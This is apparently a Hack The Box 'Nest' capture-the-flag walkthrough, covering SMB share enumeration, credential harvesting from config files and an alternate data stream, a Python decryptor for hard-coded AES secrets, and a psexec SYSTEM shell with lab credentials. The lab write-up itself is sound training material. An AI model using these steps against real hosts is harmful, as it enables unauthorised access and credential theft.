Hack The Box Nest
Nest
Sweets
Procedure
nmap
PORT     STATE SERVICE       VERSION
445/tcp  open  microsoft-ds?
4386/tcp open  unknown
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
|     Reporting Service V1.2
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions:
|     Reporting Service V1.2
|     Unrecognised command
|   Help:
|     Reporting Service V1.2
|     This service allows users to run queries against databases using the legacy HQK format
|     AVAILABLE COMMANDS ---
|     LIST
|     SETDIR <Directory_Name>
|     RUNQUERY <Query_ID>
|     DEBUG <Password>
|_    HELP <Command>
4386/tcp
A service called HQK Reporting Service V1.2 appears to be running on 4386/tcp. What the service does and what its commands mean is unknown at this point.
$ nc 10.10.10.178 4386
HQK Reporting Service V1.2
>help
Connecting with the telnet command, a response comes back.
$ telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.
HQK Reporting Service V1.2
>help
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
Perhaps the line ending (CRLF vs. LF) makes the difference?
smbclient
smbclient -L 10.10.10.178
Enter WORKGROUP\ubu's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Data            Disk
        IPC$            IPC       Remote IPC
        Secure$         Disk
        Users           Disk
Without credentials there is no permission to browse under Secure$ and Users. The directories under Users were visible.
smbclient \\\\10.10.10.178\\Data
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \IT\*
NT_STATUS_ACCESS_DENIED listing \Production\*
NT_STATUS_ACCESS_DENIED listing \Reports\*
getting file \Shared\Maintenance\Maintenance Alerts.txt of size 48 as Maintenance Alerts.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (1.1 KiloBytes/sec) (average 0.6 KiloBytes/sec)
recon download file
cat Shared/Templates/HR/Welcome\ Email.txt
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location:
\\HTB-NEST\Users\<USERNAME>

If you have any issues accessing specific services or workstations, please inform the IT department and use the credentials below until all systems have been set up for you.

Username: TempUser
Password: welcome2019

Thank you
Got TempUser's password.
smbclient with TempUser
More files can now be retrieved.
$ tree
.
├── IT
│   ├── Archive
│   ├── Configs
│   │   ├── Adobe
│   │   │   ├── editing.xml
│   │   │   ├── Options.txt
│   │   │   ├── projects.xml
│   │   │   └── settings.xml
│   │   ├── Atlas
│   │   │   └── Temp.XML
│   │   ├── DLink
│   │   ├── Microsoft
│   │   │   └── Options.xml
│   │   ├── NotepadPlusPlus
│   │   │   ├── config.xml
│   │   │   └── shortcuts.xml
│   │   ├── RU Scanner
│   │   │   └── RU_config.xml
│   │   └── Server Manager
│   ├── Installs
│   ├── Reports
│   └── Tools
├── Production
├── Reports
└── Shared
    ├── Maintenance
    │   └── Maintenance Alerts.txt
    └── Templates
        ├── HR
        │   └── Welcome Email.txt
        └── Marketing

20 directories, 11 files
Found a file with a password written in it. It is probably base64-encoded.
$ cat RU\ Scanner/RU_config.xml
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<Port>389</Port>
<Username>c.smith</Username>
<Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>
Tried base64-decoding it and logging in, but it fails.
$ smbclient \\\\10.10.10.178\\Data -U C.Smith
Enter WORKGROUP\C.Smith's password:
session setup failed: NT_STATUS_LOGON_FAILURE
Also found a file that reveals part of the directory layout.
$ cat IT/Configs/NotepadPlusPlus/config.xml
<History nbMaxFile="15" inSubMenu="no" customLength="-1">
<File filename="C:\windows\System32\drivers\etc\hosts" />
<File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
<File filename="C:\Users\C.Smith\Desktop\todo.txt" />
</History>
smbclient Secure$
Let's try the Secure$ share.
$ smbclient \\\\10.10.10.178\\Secure$ -U TempUser
Enter WORKGROUP\TempUser's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Aug  8 08:08:12 2019
  ..                                  D        0  Thu Aug  8 08:08:12 2019
  Finance                             D        0  Thu Aug  8 04:40:13 2019
  HR                                  D        0  Thu Aug  8 08:08:11 2019
  IT                                  D        0  Thu Aug  8 19:59:25 2019
It seems there are no permissions on the three directories.
smb: \> recurse
smb: \> ls *
  .                                   D        0  Thu Aug  8 08:08:12 2019
  ..                                  D        0  Thu Aug  8 08:08:12 2019
  Finance                             D        0  Thu Aug  8 04:40:13 2019
  HR                                  D        0  Thu Aug  8 08:08:11 2019
  IT                                  D        0  Thu Aug  8 19:59:25 2019

\Finance
NT_STATUS_ACCESS_DENIED listing \Finance\*

\HR
NT_STATUS_ACCESS_DENIED listing \HR\*

\IT
NT_STATUS_ACCESS_DENIED listing \IT\*
The config file from the Data share indicated that there is a Carl directory under IT, so try accessing it directly.
smb: \IT\> cd Carl
smb: \IT\Carl\> ls
  .                                   D        0  Thu Aug  8 04:42:14 2019
  ..                                  D        0  Thu Aug  8 04:42:14 2019
  Docs                                D        0  Thu Aug  8 04:44:00 2019
  Reports                             D        0  Tue Aug  6 22:45:40 2019
  VB Projects                         D        0  Tue Aug  6 23:41:55 2019

                10485247 blocks of size 4096. 6545549 blocks available
smb: \IT\Carl\> recurse
smb: \IT\Carl\> prompt
smb: \IT\Carl\> mget *
getting file \IT\Carl\Docs\ip.txt of size 56 as ip.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \IT\Carl\Docs\mmc.txt of size 73 as mmc.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\ConfigFile.vb of size 772 as ConfigFile.vb (1.9 KiloBytes/sec) (average 0.8 KiloBytes/sec)
getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\Module1.vb of size 279 as Module1.vb (0.7 KiloBytes/sec) (average 0.8 KiloBytes/sec)
getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\My Project\Application.Designer.vb of size 441 as Application.Designer.vb (1.2 KiloBytes/sec) (average 0.8 KiloBytes/sec)
getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\My Project\Application.myapp of size 481 as Application.myapp (1.3 KiloBytes/sec) (average 0.9 KiloBytes/sec)
getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\My Project\AssemblyInfo.vb of size 1163 as AssemblyInfo.vb (3.1 KiloBytes/sec) (average 1.2 KiloBytes/sec)
getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\My Project\Resources.Designer.vb of size 2776 as Resources.Designer.vb (7.3 KiloBytes/sec) (average 2.0 KiloBytes/sec)
getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\My Project\Resources.resx of size 5612 as Resources.resx (14.9 KiloBytes/sec) (average 3.4 KiloBytes/sec)
getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\My Project\Settings.Designer.vb of size 2989 as Settings.Designer.vb (7.7 KiloBytes/sec) (average 3.8 KiloBytes/sec)
getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\My Project\Settings.settings of size 279 as Settings.settings (0.7 KiloBytes/sec) (average 3.6 KiloBytes/sec)
getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\RU Scanner.vbproj of size 4828 as RU Scanner.vbproj (13.0 KiloBytes/sec) (average 4.3 KiloBytes/sec)
getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\RU Scanner.vbproj.user of size 143 as RU Scanner.vbproj.user (0.4 KiloBytes/sec) (average 4.0 KiloBytes/sec)
getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\SsoIntegration.vb of size 133 as SsoIntegration.vb (0.4 KiloBytes/sec) (average 3.8 KiloBytes/sec)
getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\Utils.vb of size 4888 as Utils.vb (12.9 KiloBytes/sec) (average 4.4 KiloBytes/sec)
getting file \IT\Carl\VB Projects\WIP\RU\RUScanner.sln of size 871 as RUScanner.sln (2.2 KiloBytes/sec) (average 4.2 KiloBytes/sec)
Got the files. Looking through them, Utils.vb contains encryption and decryption code, so the password-like string found earlier may well be encrypted with it.
Imports System.Text
Imports System.Security.Cryptography

Public Class Utils

    Public Shared Function GetLogFilePath() As String
        Return IO.Path.Combine(Environment.CurrentDirectory, "Log.txt")
    End Function

    Public Shared Function DecryptString(EncryptedString As String) As String
        If String.IsNullOrEmpty(EncryptedString) Then
            Return String.Empty
        Else
            Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Shared Function EncryptString(PlainString As String) As String
        If String.IsNullOrEmpty(PlainString) Then
            Return String.Empty
        Else
            Return Encrypt(PlainString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function
Googling "464R5DFA5DL6LE28" turned up a .NET Fiddle. Someone must have written it, maybe another solver of this box. It yields the decrypted password (xRxRxPANCAK3SxRxRx).
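As an added illustration (not code from the writeup or from the RU Scanner project) of why a config value "encrypted" this way is effectively plaintext: everyone who has the source also has the passphrase, salt, IV and iteration count, so recovery is a few lines. It assumes the Decrypt routine that the Utils.vb listing above truncates follows the usual .NET pattern of Rfc2898DeriveBytes (PBKDF2-HMAC-SHA1) feeding AES-256-CBC with PKCS#7 padding; the AES step needs either the `cryptography` or the `pycryptodome` package.

```python
import base64
import hashlib

# Parameters copied from DecryptString() in the Utils.vb listing above.
PASSPHRASE = "N3st22"
SALT = "88552299"
ITERATIONS = 2
INIT_VECTOR = "464R5DFA5DL6LE28"
KEY_SIZE = 256
# <Password> value from RU_config.xml above.
RU_CONFIG_PASSWORD = "fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE="


def aes_cbc_decrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    """Raw AES-CBC decryption using whichever third-party library is installed."""
    try:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        decryptor = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
        return decryptor.update(data) + decryptor.finalize()
    except ImportError:
        from Crypto.Cipher import AES  # pycryptodome
        return AES.new(key, AES.MODE_CBC, iv).decrypt(data)


def hqk_decrypt(cipher_b64, passphrase, salt, iterations, init_vector, key_size):
    """Assumed mirror of Utils.Decrypt(): Rfc2898DeriveBytes (PBKDF2-HMAC-SHA1)
    derives the AES key; salt and IV are the ASCII bytes of the literal strings."""
    key = hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                              salt.encode("ascii"), iterations, key_size // 8)
    plain = aes_cbc_decrypt(key, init_vector.encode("ascii"),
                            base64.b64decode(cipher_b64))
    # PKCS#7 padding check: wrong key material shows up here as garbage padding.
    pad = plain[-1]
    if not 1 <= pad <= 16 or plain[-pad:] != bytes([pad]) * pad:
        raise ValueError("padding check failed: wrong parameters or corrupted ciphertext")
    return plain[:-pad].decode("utf-8")


def recover_ru_scanner_password() -> str:
    """The c.smith value from RU_config.xml, decrypted with the hard-coded parameters."""
    return hqk_decrypt(RU_CONFIG_PASSWORD, PASSPHRASE, SALT, ITERATIONS,
                       INIT_VECTOR, KEY_SIZE)


if __name__ == "__main__":
    print(recover_ru_scanner_password())
```

The lesson for the application side is that a secret protected only by key material shipped in the same code base should be treated as stored in the clear; DPAPI or a proper secret store is the fix.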
smbclient
Log in over SMB again with the recovered credentials.
$ smbclient \\\\10.10.10.178\\Users -U C.Smith
Enter WORKGROUP\C.Smith's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jan 26 08:04:21 2020
  ..                                  D        0  Sun Jan 26 08:04:21 2020
  Administrator                       D        0  Sat Aug 10 00:08:23 2019
  C.Smith                             D        0  Sun Jan 26 16:21:44 2020
  L.Frost                             D        0  Fri Aug  9 02:03:01 2019
  R.Thompson                          D        0  Fri Aug  9 02:02:50 2019
  TempUser                            D        0  Thu Aug  8 07:55:56 2019

                10485247 blocks of size 4096. 6545661 blocks available
smb: \> cd C.Smith\
C.Smith\HQK Reporting\    C.Smith\user.txt
smb: \> cd C.Smith\
smb: \C.Smith\> get user.txt
getting file \C.Smith\user.txt of size 32 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
get user flag !!
admin flag
dir walk
HqkLdap.exe is a .NET executable; it contains the LDAP query and encryption handling code. Under C.Smith's directory in Users there is a debug mode password file, but it is empty... hmm, suspicious.
├── HQK Reporting
│   ├── AD Integration Module
│   │   └── HqkLdap.exe
│   ├── Debug Mode Password.txt
│   └── HQK_Config_Backup.xml
└── user.txt
Try the allinfo command.
smb: \C.Smith\> allinfo "HQK Reporting\Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time:    金  8月  9 08時06分12秒 2019 JST
access_time:    金  8月  9 08時06分12秒 2019 JST
write_time:     金  8月  9 08時08分17秒 2019 JST
change_time:    金  8月  9 08時08分17秒 2019 JST
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
Found a stream named Password in an alternate data stream (ADS) of the file.
smb: \C.Smith\> more "HQK Reporting\Debug Mode Password.txt:Password"
WBQ201953D8w
Got the debug password (WBQ201953D8w).
4386/tcp
Feed the password obtained above to the service on 4386/tcp.
telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.
HQK Reporting Service V1.2

>help
This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
>debug WBQ201953D8w
Debug mode enabled. Use the HELP command to view additional commands that are now available
>help
This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>
More commands are available now!!
It appears that setdir changes the current directory and showquery prints a file's contents. This yields the Administrator's password.
>setdir C:\Program Files\HQK
Current directory set to HQK
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[DIR]  ALL QUERIES
[DIR]  LDAP
[DIR]  Logs
[1]   HqkSvc.exe
[2]   HqkSvc.InstallState
[3]   HQK_Config.xml

Current Directory: HQK
>set dir LDAP
Unrecognised command
>setdir LDAP
Current directory set to LDAP
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[1]   HqkLdap.exe
[2]   Ldap.conf

Current Directory: LDAP
>showquery 2
Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
Tried the earlier .NET Fiddle on this value, but it does not decrypt. It seems the right approach is to decrypt with the parameters found in the exe. This time I did it properly myself lol; I just added a main function to the decompiled code lol.
Got the password (XtH4nkS4Pl4y1nGX)!!
Use impacket's psexec
$ python3 /opt/impacket/examples/psexec.py administrator:XtH4nkS4Pl4y1nGX@10.10.10.178
Impacket v0.9.24.dev1+20210827.162957.5aa97fa7 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.10.178.....
[*] Found writable share ADMIN$
[*] Uploading file aeexaNwJ.exe
[*] Opening SVCManager on 10.10.10.178.....
[*] Creating service gTVc on 10.10.10.178.....
[*] Starting service gTVc.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system